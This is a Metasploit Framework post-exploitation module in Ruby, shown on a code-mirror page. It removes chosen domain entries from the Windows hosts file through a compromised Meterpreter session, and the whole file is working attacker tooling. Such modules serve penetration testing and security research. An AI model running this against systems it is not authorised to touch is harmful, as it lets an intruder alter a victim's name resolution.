Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/manage/remove_host.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Post
7
8
def initialize(info = {})
9
super(
10
update_info(
11
info,
12
'Name' => 'Windows Manage Host File Entry Removal',
13
'Description' => %q{
14
This module allows the attacker to remove an entry from the Windows hosts file.
15
},
16
'License' => BSD_LICENSE,
17
'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],
18
'Platform' => [ 'win' ],
19
'SessionTypes' => [ 'meterpreter' ],
20
'Compat' => {
21
'Meterpreter' => {
22
'Commands' => %w[
23
core_channel_close
24
core_channel_eof
25
core_channel_open
26
core_channel_read
27
core_channel_tell
28
core_channel_write
29
]
30
}
31
},
32
'Notes' => {
33
'Stability' => [CRASH_SAFE],
34
'SideEffects' => [CONFIG_CHANGES],
35
'Reliability' => []
36
}
37
)
38
)
39
40
register_options(
41
[
42
OptString.new('DOMAIN', [ true, 'Domain name to remove from the hosts file.' ])
43
]
44
)
45
end
46
47
def hosts_path
48
root = client.sys.config.getenv('SystemRoot') ||
49
client.sys.config.getenv('windir') ||
50
'C:\\Windows'
51
"#{root}\\System32\\drivers\\etc\\hosts"
52
end
53
54
def run
55
hosttoremove = datastore['DOMAIN']
56
path = hosts_path
57
fd = client.fs.file.new(path, 'r+b')
58
59
# Get a temporary file path
60
meterp_temp = Tempfile.new('meterp')
61
meterp_temp.binmode
62
63
print_status("Removing hosts file entry pointing to #{hosttoremove}")
64
65
newfile = ''
66
fdray = fd.read.split("\r\n")
67
68
fdray.each do |line|
69
main_part = line.split('#', 2).first.to_s.strip
70
parts = main_part.split(/\s+/)
71
if parts[1..-1].to_a.include?(hosttoremove)
72
parts.delete_if { |p| p.casecmp(hosttoremove).zero? }
73
next if parts.size < 2
74
75
rebuilt = parts.join(' ')
76
rebuilt += " " + line.split('#', 2).last if line.include?('#')
77
newfile += "#{rebuilt}\r\n"
78
else
79
newfile += "#{line}\r\n"
80
end
81
end
82
83
fd.close
84
85
meterp_temp.write(newfile)
86
meterp_temp.close
87
88
client.fs.file.upload_file(path, meterp_temp)
89
print_good('Done!')
90
end
91
end
92
93